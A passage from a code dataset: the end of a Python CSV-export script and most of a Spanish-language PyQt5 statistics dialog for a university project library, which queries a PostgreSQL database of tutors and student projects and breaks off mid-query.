calc_output_stage(output_csv_table, output_title, args)\n\n def save_csv(filepath, csv_table, title):\n with open(filepath, \"w\") as fp:\n csv_d = csv.DictWriter(fp, fieldnames=title, lineterminator=\"\\n\")\n csv_d.writeheader()\n csv_d.writerows(csv_table)\n\n save_csv(output_csv_path, output_csv_table, output_title)\n save_csv(output_sum_csv_path, output_sum_csv_table, output_title)\n save_csv(output_stage_csv_path, output_stage_csv_table, output_title)\n\n\nif __name__ == \"__main__\":\n n_agent, n, k, p, t, ts, exp_name, exp_id = get_args()\n args = get_file_path(n_agent, n, k, p, t, ts,exp_name, exp_id)\n main(args)\n","repo_name":"wzkDTerH/psySandbox","sub_path":"analyze_script/leadership_bill_post/leadership_bill_post.py","file_name":"leadership_bill_post.py","file_ext":"py","file_size_in_byte":9964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70939494935","text":"#---------------------------------------------------------------------------------#\r\n# Programa: Biblioteca Digital de Proyectos de Informatica #\r\n# Programador: Luis Amaya #\r\n# Analistas: Jose Astudillo / josmary Botaban #\r\n# Producto desarrollado para el PNF de Informatica del UPTJAA Extension El Tigre #\r\n# Octubre (2018) #\r\n# Version 1.0 #\r\n# Modulo: Estadisticas del Sistema #\r\n# Descripción: Genera Estadisticas de los Proyectos Registrados en el Sistema #\r\n#---------------------------------------------------------------------------------#\r\n\r\n# Importacion de librerias del sistema\r\nimport sys, os, shutil, functools, re\r\nfrom PyQt5.QtWidgets import QApplication, QPushButton, QMessageBox, QDialog, QTableWidget, QTableWidgetItem, QFileDialog\r\nfrom PyQt5 import uic\r\nfrom PyQt5.QtGui import QIcon, QFont, QColor\r\nfrom PyQt5.QtCore import Qt\r\nimport ctypes #GetSystemMetrics\r\nimport psycopg2, psycopg2.extras, psycopg2.extensions, hashlib, select\r\nimport easygui as eg\r\nfrom reportlab.pdfgen import canvas\r\nfrom reportlab.lib.pagesizes import letter, landscape\r\nimport webbrowser as wb\r\nfrom datetime import datetime, date, time, timedelta\r\nimport calendar\r\nimport os.path as path\r\n\r\nclass DialogoEstadistica(QDialog):\r\n\t#Método constructor de la clase\r\n\tdef __init__(self):\r\n\t\t#Iniciar el objeto DialogoAcceso\r\n\t\tQDialog.__init__(self)\r\n\t\tuic.loadUi(\"estadisticas.ui\", self)\r\n\t\t#Habilitar Cuadro de Dialogo\r\n\t\tself.setEnabled(True)\r\n\t\tself.setWindowFlags(Qt.WindowMinimizeButtonHint | Qt.WindowCloseButtonHint | Qt.MSWindowsFixedSizeDialogHint)\r\n\r\n\t\t#Operacion para centrar la ventana en la pantalla\r\n\t\tresolucion = ctypes.windll.user32\r\n\t\tresolucion_ancho = resolucion.GetSystemMetrics(0)\r\n\t\tresolucion_alto = resolucion.GetSystemMetrics(1)\r\n\t\tleft = (resolucion_ancho / 2) - (self.frameSize().width() / 2)\r\n\t\ttop = (resolucion_alto / 2) - (self.frameSize().height() / 2) - 40\r\n\t\tself.move(left, top)\r\n\t\tself.archivo_infosvr = ''\r\n\t\tself.infosvr = []\r\n\t\tself.lista = []\r\n\t\tself.BD_Name = ''\r\n\t\tself.BD_User = ''\r\n\t\tself.BD_Pass = ''\r\n\t\tself.archivo_infosvr = open('regsvr.txt','r')\r\n\t\tself.infosvr = self.archivo_infosvr.readlines()\r\n\t\tself.BD_Name = self.infosvr[0]\r\n\t\tself.BD_Name = self.BD_Name.replace('\\n', '').replace('\\r', '') \r\n\t\tself.BD_User = self.infosvr[1]\r\n\t\tself.BD_User = self.BD_User.replace('\\n', '').replace('\\r', '') \r\n\t\tself.BD_Pass = self.infosvr[2]\r\n\t\tself.BD_Pass = self.BD_Pass.replace('\\n', '').replace('\\r', '') \r\n\t\tself.archivo_infosvr.close\r\n\r\n\t\t#Establecer conexion a la Base de Datos\r\n\t\tcad_con = \"dbname='%s' user='%s' password='%s' host='localhost'\" % (self.BD_Name, self.BD_User, self.BD_Pass)\r\n\t\ttry:\r\n\t\t\tself.db = psycopg2.connect(cad_con)\r\n\t\texcept:\r\n\t\t\tQMessageBox.warning(self, \"Error de Base de Datos\", \"Ocurrio un error al intentar comunicarse con la Base de Datos\", QMessageBox.Ok)\r\n\t\t\tself.quit()\r\n\t\telse:\r\n\t\t\tself.db.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\r\n\t\t\tself.cursor = self.db.cursor()\r\n\r\n\t\t# Definicion de Variables\r\n\t\tself.hoy = datetime.today()\r\n\t\tself.formato_fecha1 = \"%d días del mes de %B del año %Y\"\r\n\t\tself.formato_fecha2 = \"%d-%m-%Y\"\r\n\t\tself.formato_fecha3 = \"%m\"\r\n\t\tself.formato_fecha4 = \"%Y\"\r\n\t\tself.formato_fecha5 = \"%Y-%m-%d-%H%M%S\"\r\n\t\tself.fechaarchivo = self.hoy.strftime(self.formato_fecha5)\r\n\t\tself.ano = self.hoy.strftime(self.formato_fecha4)\r\n\t\tself.mes = self.meses(self.hoy.strftime(self.formato_fecha3))\r\n\t\tself.formato_fecha1 = \"%d días del mes de \" + self.mes + \" del año %Y\"\r\n\t\tself.fecha1 = self.hoy.strftime(self.formato_fecha2)\r\n\t\tself.fecha2 = self.hoy.strftime(self.formato_fecha1)\r\n\t\tself.archivo = './Estadisticas/Estadistica '+self.fechaarchivo + '.pdf'\r\n\t\tself.archivo2 = (r'.\\Estadisticas\\Estadistica '+self.fechaarchivo + '.pdf')\r\n\t\t#Creando Documento PDF\r\n\t\tself.c = \"\"\r\n\r\n\t\tself.origen = \"\"\r\n\t\tself.destino = \"\"\r\n\t\tself.bdvacia = 0\r\n\t\tself.detallado = 0\r\n\t\tself.contlinea = 0\r\n\t\tself.IdProyecto = 0\r\n\t\tself.IdPeriodo = 0\r\n\t\tself.cedula = 0\r\n\t\tself.fechaini = 0\r\n\t\tself.fechafin = 0\r\n\t\tself.totalSecciones = 0\r\n\t\tself.imprimir_encabezado = 0\r\n\t\tself.cedula_tutor=\"\"\r\n\t\tself.nombre_tutor=\"\"\r\n\t\tself.cedula_anterior=\"\"\r\n\t\tself.TotalRegistros = 0\r\n\t\tself.TotalTutores = 0\r\n\t\tself.TotalEstudiantes = 0\r\n\t\tself.TotalProyectos = 0\r\n\t\tself.TotalSInformacion = 0\r\n\t\tself.TotalDWeb = 0\r\n\t\tself.TotalRedes = 0\r\n\t\tself.TotalApps = 0\r\n\t\tself.TotalTutorEstudiantes = 0\r\n\t\tself.TotalTutorProyectos = 0\r\n\t\tself.TotalTutorSInformacion = 0\r\n\t\tself.TotalTutorDWeb = 0\r\n\t\tself.TotalTutorRedes = 0\r\n\t\tself.TotalTutorApps = 0\r\n\t\tself.TotalGeneralProyectos = 0\r\n\t\tself.TotalGeneralSInformacion = 0\r\n\t\tself.TotalGeneralDWeb = 0\r\n\t\tself.TotalGeneralRedes = 0\r\n\t\tself.TotalGeneralApps = 0\r\n\t\tself.RegistroActual = 0\r\n\t\tself.ano_periodo = \"\"\r\n\t\tself.trayecto = \"\"\r\n\t\tself.seccion = \"\"\r\n\t\tself.tipo_trayecto = \"\"\r\n\t\tself.ano_prosecucion = \"\"\r\n\t\tself.linea = 0\r\n\t\tself.hoy = datetime.today()\r\n\t\tself.formato_fecha = \"%d-%m-%Y\"\r\n\t\tself.formato_fecha2 = \"%Y\"\r\n\t\tself.AnoActual = self.hoy.strftime(self.formato_fecha2)\r\n\t\tself.FechaActual = self.hoy.strftime(self.formato_fecha)\r\n\t\t# Configuracion Tabla Grupos de Proyecto\r\n\t\tself.tablaEstadisticas.setAlternatingRowColors(True) #Instruccion para Alternar color de las filas\r\n\t\tself.tablaEstadisticas.setEditTriggers(QTableWidget.NoEditTriggers) #Instruccion para deshabilitar edicion\r\n\t\tself.tablaEstadisticas.setDragDropOverwriteMode(False) # Deshabilitar el comportamiento de arrastrar y soltar\r\n\t\tself.tablaEstadisticas.setSelectionBehavior(QTableWidget.SelectRows) # Seleccionar toda la fila\r\n\t\tself.tablaEstadisticas.setSelectionMode(QTableWidget.SingleSelection) # Seleccionar una fila a la vez\r\n\t\tself.tablaEstadisticas.setTextElideMode(Qt.ElideRight)# Qt.ElideNone \r\n\t\t # Especifica dónde deben aparecer los puntos suspensivos \"...\" cuando se muestran \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t # textos que no encajan\r\n\t\tself.tablaEstadisticas.setWordWrap(True) # Establecer el ajuste de palabras del texto \r\n\t\tself.tablaEstadisticas.setSortingEnabled(True) # Habilitar clasificación\r\n\t\tself.tablaEstadisticas.setColumnCount(13) # Establecer el número de columnas\r\n\t\tself.tablaEstadisticas.setRowCount(0) # Establecer el número de filas\r\n\t\tself.tablaEstadisticas.horizontalHeader().setDefaultAlignment(Qt.AlignHCenter|Qt.AlignVCenter| Qt.AlignCenter) # Alineación del texto del encabezado\r\n\t\tself.tablaEstadisticas.horizontalHeader().setHighlightSections(True) # Deshabilitar resaltado del texto del encabezado al seleccionar una fila\r\n\t\tself.tablaEstadisticas.horizontalHeader().setStretchLastSection(True) # Hacer que la última sección visible del encabezado ocupa todo el espacio disponible\r\n\t\tself.tablaEstadisticas.verticalHeader().setVisible(False) # Ocultar encabezado vertical\r\n\t\tself.tablaEstadisticas.verticalHeader().setDefaultSectionSize(20) # Establecer altura de las filas\r\n\t\tnombreColumnasProyecto = (\"Cedula Tutor\", \"Nombre\", \"Periodo\", \"Trayecto\", \"Seccion\", \"Tipo de Trayecto\", \"Año Prosecucion\", \"Total Proyectos\", \"Total Estudiantes\", \"Total S. Informacion\", \"Total D. WEB\", \"Total Redes\", \"Total APP Móviles\")\r\n\t\t# Establecer las etiquetas de encabezado horizontal usando etiquetas\r\n\t\tself.tablaEstadisticas.setHorizontalHeaderLabels(nombreColumnasProyecto)\r\n\t\t# Establecer ancho de las columnas\r\n\t\tfor indice, ancho in enumerate((80, 150, 60, 60, 60, 100, 100, 100, 120, 120, 120, 120, 120 ), start=0):\r\n\t\t\tself.tablaEstadisticas.setColumnWidth(indice, ancho)\r\n\r\n\t\t# Ocultar campos iniciales\r\n\t\tself.txtCedula.setEnabled(False)\r\n\t\tself.txtCedula.setText(\"0\")\r\n\t\tself.txtTutor.setText(\"\")\r\n\t\tself.txtTutor.hide()\r\n\t\tself.lblTutor.hide()\r\n\t\tself.txtCedulaSeleccionada.hide()\r\n\t\tself.chkTutor.setChecked(False)\r\n\t\tself.chkPeriodo.setChecked(False)\r\n\t\tself.grpFechas.setEnabled(False)\r\n\t\tself.cmbFechaini.setEnabled(False)\r\n\t\tself.cmbFechafin.setEnabled(False)\r\n\t\tself.cmbFechaini.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\tself.cmbFechafin.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\tself.btnReset.setEnabled(False)\r\n\t\tself.btnBuscarTutor.setEnabled(False)\r\n\r\n\t\t# Ocultar Lista de Tutores\r\n\t\tself.grpTutores.hide()\r\n\t\t#------------------------------------------------#\r\n\t\t# Botones y Disparadores Eventos Tab Principal #\r\n\t\t#\r\n\t\t\r\n\t\t# Vincular eventos de click de los botones a las funciones correspondientes\r\n\t\tself.btnGeneraEstadistica.clicked.connect(self.LlenarEstadistica)\r\n\t\tself.btnReset.clicked.connect(self.resetEstadistica)\r\n\t\tself.btnBuscarTutor.clicked.connect(self.AsignaTutor)\r\n\t\tself.btnSelTutor.clicked.connect(self.ElejirTutor)\r\n\t\tself.btnRetorno.clicked.connect(self.RetornoTutor)\r\n\t\tself.btnCerrar.clicked.connect(self.cerrar)\r\n\t\tself.chkTutor.clicked.connect(self.chequeoTutor)\r\n\t\tself.chkPeriodo.clicked.connect(self.chequeoPeriodo)\r\n\t\tself.optAnual.clicked.connect(self.chequeoGrpFechas)\r\n\t\tself.optRango.clicked.connect(self.chequeoGrpFechas)\r\n\t\tself.optDetallado.clicked.connect(self.chequeoTipoEstadistica)\r\n\t\tself.optConsolidado.clicked.connect(self.chequeoTipoEstadistica)\r\n\t\tself.btnImprime.clicked.connect(self.emitirEstadistica)\r\n\t\tself.ListaTutores.itemDoubleClicked.connect(self.ElejirTutor)\r\n\t\tself.ListaTutores.itemClicked.connect(self.actCedulaBuscar)\r\n\t\tself.optCedula.clicked.connect(self.ordenarTabla)\r\n\t\tself.optNombre.clicked.connect(self.ordenarTabla)\r\n\t\tself.optApellido.clicked.connect(self.ordenarTabla)\r\n\t\tself.txtFiltro.textChanged.connect(self.buscarDato)\r\n\r\n\t# Rutina para ordenar la lista de tutores\r\n\tdef ordenarTabla(self):\r\n\t\tif self.optCedula.isChecked():\r\n\t\t\tself.ListaTutores.horizontalHeader().setSortIndicator(0, Qt.AscendingOrder)\r\n\t\telif self.optNombre.isChecked():\r\n\t\t\tself.ListaTutores.horizontalHeader().setSortIndicator(1, Qt.AscendingOrder)\r\n\t\telse:\r\n\t\t\tself.ListaTutores.horizontalHeader().setSortIndicator(2, Qt.AscendingOrder)\r\n\r\n\t# Rutina para actualizar el campo de busqueda con la cedula del tutor al hacer click en \r\n\t# un registro de la tabla\r\n\tdef actCedulaBuscar(self):\r\n\t\tfila = self.ListaTutores.currentRow()\r\n\t\ttotalregistros = self.ListaTutores.rowCount()\r\n\t\tcedula = self.ListaTutores.item(fila, 0).text().replace(\" \", \"\")\r\n\t\tself.txtCedulaSeleccionada.setText(cedula)\r\n\r\n\t# Rutina para fijar el cursor de la tabla al ir introduciendo datos en el campo de busqueda de\r\n\t# acuerdo al ordenamiento de la tabla\r\n\tdef buscarDato(self):\r\n\t\tlv_texto = self.txtFiltro.text().upper()\r\n\t\tif self.optCedula.isChecked()== True:\r\n\t\t\tvalidar = re.match('^[0-9\\s]+$', lv_texto, re.I)\r\n\t\t\tcolumna = 0\r\n\t\telif self.optNombre.isChecked()==True:\t\r\n\t\t\tvalidar = re.match('^[a-zA-Z0-9\\sáéíóúàèìòùäëïöüñ]+$', lv_texto, re.I)\r\n\t\t\tcolumna = 1\r\n\t\telse:\r\n\t\t\tvalidar = re.match('^[a-zA-Z0-9\\sáéíóúàèìòùäëïöüñ]+$', lv_texto, re.I)\r\n\t\t\tcolumna = 2\r\n\t\tindex = self.ListaTutores.rowCount()\r\n\t\tfila=0\r\n\t\tencontrar = 0\r\n\t\twhile fila < index:\r\n\t\t\tlv_busqueda = self.ListaTutores.item(fila,columna).text()\r\n\t\t\tif lv_texto in lv_busqueda:\r\n\t\t\t\tencontrar = 1\r\n\t\t\t\tbreak;\r\n\t\t\tfila = fila + 1\r\n\t\tif encontrar == 1:\r\n\t\t\tposicion = self.ListaTutores.item(fila, columna)\r\n\t\t\tself.ListaTutores.scrollToItem(posicion)\r\n\t\t\tself.ListaTutores.setCurrentCell(fila, columna)\r\n\t\t\tself.txtCedulaSeleccionada.setText(self.ListaTutores.item(fila, 0).text().replace(\" \", \"\"))\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\treturn False\r\n\r\n\r\n\t# Rutina para activar los botones de seleccion de busqueda\r\n\tdef activa_botones(self):\r\n\t\tself.grpTipo.setEnabled(True)\r\n\t\tself.btnReset.setEnabled(False)\r\n\t\tself.btnBuscarTutor.setEnabled(True)\r\n\t\tself.btnGeneraEstadistica.setEnabled(True)\r\n\t\tself.chkTutor.setEnabled(True)\r\n\t\tself.chkPeriodo.setEnabled(True)\r\n\t\tself.chkTutor.setChecked(False)\r\n\t\tself.chkPeriodo.setChecked(False)\r\n\r\n\t# Rutina para desactivar los botones de seleccion de busqueda\r\n\tdef desactiva_botones(self):\r\n\t\tself.grpTipo.setEnabled(False)\r\n\t\tself.btnReset.setEnabled(True)\r\n\t\tself.btnBuscarTutor.setEnabled(False)\r\n\t\tself.btnGeneraEstadistica.setEnabled(False)\r\n\t\tself.chkTutor.setEnabled(False)\r\n\t\tself.chkPeriodo.setEnabled(False)\r\n\t\tself.txtCedula.setEnabled(False)\r\n\t\tself.grpFechas.setEnabled(False)\r\n\t\tself.cmbFechaini.setEnabled(False)\r\n\t\tself.cmbFechafin.setEnabled(False)\r\n\t\t\r\n\r\n\t# Rutina para vaciar la tabla para nueva busqueda\r\n\tdef resetEstadistica(self):\r\n\t\tif self.TotalRegistros > 0:\r\n\t\t\tself.tablaEstadisticas.clearSelection()\r\n\t\t\tself.tablaEstadisticas.clearContents()\r\n\t\t\tindex2 = self.TotalRegistros\r\n\t\t\tindex3 = 0\r\n\t\t\twhile index2 > 0:\r\n\t\t\t\tindex3 = index2 - 1\r\n\t\t\t\tself.tablaEstadisticas.removeRow(index3)\r\n\t\t\t\tindex2 = index2 - 1\r\n\t\tself.optAnual.setChecked(True)\r\n\t\tself.chequeoGrpFechas()\r\n\t\tself.activa_botones()\r\n\t\tself.txtCedula.setText(\"\")\r\n\t\tself.chkPeriodo.setChecked(False)\r\n\t\tself.chequeoTutor()\r\n\r\n\t# Rutina para activar o desactivar campos de acuerdo al tipo de estadistica\r\n\tdef chequeoTipoEstadistica(self):\r\n\t\tif self.optDetallado.isChecked():\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(3, False)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(4, False)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(5, False)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(6, False)\t\r\n\t\telse:\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(3, True)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(4, True)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(5, True)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(6, True)\r\n\r\n\t# Rutina para activar o desactivar campos de tutor acuerdo seleccion de tutor unico o general\r\n\tdef chequeoTutor(self):\r\n\t\tif self.chkTutor.isChecked():\r\n\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\tself.txtCedula.setEnabled(True)\r\n\t\t\tself.lblTutor.show()\r\n\t\t\tself.txtTutor.show()\r\n\t\t\tself.txtTutor.setText(\"\")\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(0, True)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(1, True)\r\n\t\t\tself.btnBuscarTutor.setEnabled(True)\r\n\t\telse:\r\n\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\tself.txtCedula.setEnabled(False)\r\n\t\t\tself.lblTutor.hide()\r\n\t\t\tself.txtTutor.hide()\r\n\t\t\tself.txtTutor.setText(\"\")\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(0, False)\r\n\t\t\tself.tablaEstadisticas.setColumnHidden(1, False)\r\n\t\t\tself.btnBuscarTutor.setEnabled(False)\r\n\r\n\t# Rutina para hailitar o deshabilitar busqueda por periodo \r\n\tdef chequeoPeriodo(self):\r\n\t\tif self.chkPeriodo.isChecked():\r\n\t\t\tself.grpFechas.setEnabled(True)\r\n\t\t\tself.optAnual.setChecked(True)\r\n\t\t\tself.cmbFechaini.setEnabled(True)\r\n\t\t\tself.cmbFechafin.setEnabled(False)\r\n\t\t\tself.cmbFechaini.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\t\tself.cmbFechafin.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\telse:\r\n\t\t\tself.grpFechas.setEnabled(False)\r\n\t\t\tself.optAnual.setChecked(True)\r\n\t\t\tself.cmbFechaini.setEnabled(False)\r\n\t\t\tself.cmbFechafin.setEnabled(False)\r\n\t\t\tself.cmbFechaini.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\t\tself.cmbFechafin.setCurrentIndex(int(self.AnoActual)-2013)\r\n\r\n\t# Rutina para habilitar busqueda por fecha simple o rango de fechas\r\n\tdef chequeoGrpFechas(self):\r\n\t\tif self.optAnual.isChecked():\r\n\t\t\tself.cmbFechafin.setEnabled(False)\r\n\t\t\tself.cmbFechaini.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\t\tself.cmbFechafin.setCurrentIndex(int(self.AnoActual)-2013)\r\n\t\telse:\r\n\t\t\tself.cmbFechafin.setEnabled(True)\r\n\t\t\tself.cmbFechaini.setCurrentIndex(0)\r\n\t\t\tself.cmbFechafin.setCurrentIndex(int(self.AnoActual)-2013)\r\n\r\n\t# Rutina para cargar la tabla de tutores \r\n\tdef cargaTutores(self):\r\n\t\tindex2 = self.ListaTutores.rowCount()\r\n\t\tif index2 > 0:\r\n\t\t\tself.ListaTutores.clearSelection()\r\n\t\t\tself.ListaTutores.clearContents()\r\n\t\t\tindex3 = 0\r\n\t\t\twhile index2 > 0:\r\n\t\t\t\tindex3 = index2 - 1\r\n\t\t\t\tself.ListaTutores.removeRow(index3)\r\n\t\t\t\tindex2 = index2 - 1\r\n\t\tcursor_lista_tutores = \"SELECT cedula_tutor, nombre_tutor, apellido_tutor FROM tutores WHERE estado = 'Activo' order by cedula_tutor\"\r\n\t\tself.cursor.execute(cursor_lista_tutores)\r\n\t\tindex = 0\r\n\t\tfor rows in self.cursor:\r\n\t\t\tself.ListaTutores.insertRow(index)\r\n\t\t\tlvcedula = str(rows[0])\r\n\t\t\tlvnombre = str(rows[1])\r\n\t\t\tlvapellido = str(rows[2])\r\n\t\t\tself.ListaTutores.setItem(index, 0, QTableWidgetItem((' '+lvcedula)[-8:]))\r\n\t\t\tself.ListaTutores.setItem(index, 1, QTableWidgetItem(lvnombre))\r\n\t\t\tself.ListaTutores.setItem(index, 2, QTableWidgetItem(lvapellido))\r\n\t\t\tindex = index + 1\r\n\r\n\t# Rutina para extraer los datos de un tutor de la base de datos\r\n\tdef consulta_tutor(self,lvcedula):\r\n\t\tif lvcedula == '0' or lvcedula == '':\r\n\t\t\tself.txtTutor=''\r\n\t\telse:\r\n\t\t\tbdbuscar_tutor = \"SELECT cedula_tutor, nombre_tutor, apellido_tutor, estado from tutores where cedula_tutor = %i\" % int(lvcedula)\r\n\t\t\tself.cursor.execute(bdbuscar_tutor)\r\n\t\t\trows=self.cursor.fetchone()\r\n\t\t\tif rows == None:\r\n\t\t\t\tself.encontrar = 0\r\n\t\t\t\tself.txtTutor.setText('')\r\n\t\t\telse:\r\n\t\t\t\tif str(rows[3]) == 'Inactivo':\r\n\t\t\t\t\tcontinuar = 0\r\n\t\t\t\t\tvtutor = (str(rows[1]) + ' ' + str(rows[2]))\r\n\t\t\t\t\trespuesta = QMessageBox.warning(self,\"Precaucion...\", \"El Tutor \" + vtutor + \" seleccionado esta inactivo\\n Desea continuar?\", QMessageBox.Yes | QMessageBox.No) \r\n\t\t\t\t\tif respuesta == QMessageBox.Yes:\r\n\t\t\t\t\t\tcontinuar = 1\r\n\t\t\t\t\telse: \r\n\t\t\t\t\t\tself.txtTutor.setText(\"\")\r\n\t\t\t\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tcontinuar = 1\r\n\t\t\t\tif continuar == 1:\r\n\t\t\t\t\tself.txtTutor.setText(str(rows[1]) + ' ' + str(rows[2]))\r\n\t\t\t\t\tself.encontrar = 1\r\n\t\t\tif self.encontrar == 0:\r\n\t\t\t\trespuesta = QMessageBox.warning(self,\"Error...\", \"Cedula del Tutor no esta registrado, dirijase al modulo de registro de tutores y añada nuevo tutor o seleccione uno de la lista\\n Desea acceder a la lista?\", QMessageBox.Yes | QMessageBox.No)\r\n\t\t\t\tif respuesta == QMessageBox.Yes:\r\n\t\t\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\t\t\tself.AsignaTutor()\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\t\t\tself.txtTutor.setText('')\r\n\r\n\t# Rutina para asignar tutor a la busqueda de estadisticas\r\n\tdef AsignaTutor(self):\r\n\t\t#self.cargaTutores()\r\n\t\tif self.txtCedula.text()=='' or self.txtCedula.text()=='0':\r\n\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\tself.cargaTutores()\r\n\t\t\tself.grpTutores.show()\r\n\t\telse:\r\n\t\t\tlv_cedula_tutor = int(self.txtCedula.text())\r\n\t\t\tself.consulta_tutor(str(lv_cedula_tutor))\r\n\r\n\t# Rutina para elejir un tutor de la lista de busqueda\r\n\tdef ElejirTutor(self):\r\n\t\tif self.ListaTutores.currentRow() == -1:\r\n\t\t\tQMessageBox.information(self,\"Base de Datos\", \"Debe seleccionar un tutor de la lista\", QMessageBox.Ok)\r\n\t\telse:\r\n\t\t\trow = self.ListaTutores.currentRow()\r\n\t\t\tself.txtCedula.setText(self.txtCedulaSeleccionada.text())\r\n\t\t\tself.txtTutor.setText(self.ListaTutores.item(row, 1).text() + \" \" + self.ListaTutores.item(row, 2).text())\r\n\t\tself.grpTutores.hide()\r\n\r\n\t# Rutina para retornar sin elejir tutor de la lista de busqueda\r\n\tdef RetornoTutor(self):\r\n\t\trespuesta = QMessageBox.warning(self,\"Base de Datos\", \"Esta seguro de no elejir ningun tutor?\", QMessageBox.Yes | QMessageBox.No)\r\n\t\tif respuesta == QMessageBox.Yes:\r\n\t\t\tself.txtCedula.setText(\"0\")\r\n\t\t\tself.txtTutor.setText(\"\")\r\n\t\tself.grpTutores.hide()\r\n\r\n\t# Rutina para cargar los datos en la tabla de estadistica de acuerdo a la seleccion del usuario\r\n\tdef LlenarEstadistica(self):\r\n\t\tself.desactiva_botones()\r\n\t\tself.tablaEstadisticas.setRowCount(0)\r\n\t\tself.cedula = int(self.txtCedula.text())\r\n\t\tself.fechaini = int(self.cmbFechaini.currentText())\r\n\t\tself.fechafin = int(self.cmbFechafin.currentText())\r\n\t\tif self.chkTutor.isChecked():\r\n\t\t\tif self.chkPeriodo.isChecked():\r\n\t\t\t\tif self.optAnual.isChecked():\r\n\t\t\t\t\tcursor_consulta = \"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tWHERE tut.cedula_tutor='%i' AND sec.ano_seccion = '%i' \r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\" % (self.cedula, self.fechaini)\r\n\t\t\t\telse:\r\n\t\t\t\t\tcursor_consulta = \"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tWHERE tut.cedula_tutor='%i' AND tray.periodo_academico >= %i AND tray.periodo_academico <= %i \r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\" % (self.cedula, self.fechaini, self.fechafin)\r\n\t\t\telse:\r\n\t\t\t\tcursor_consulta = 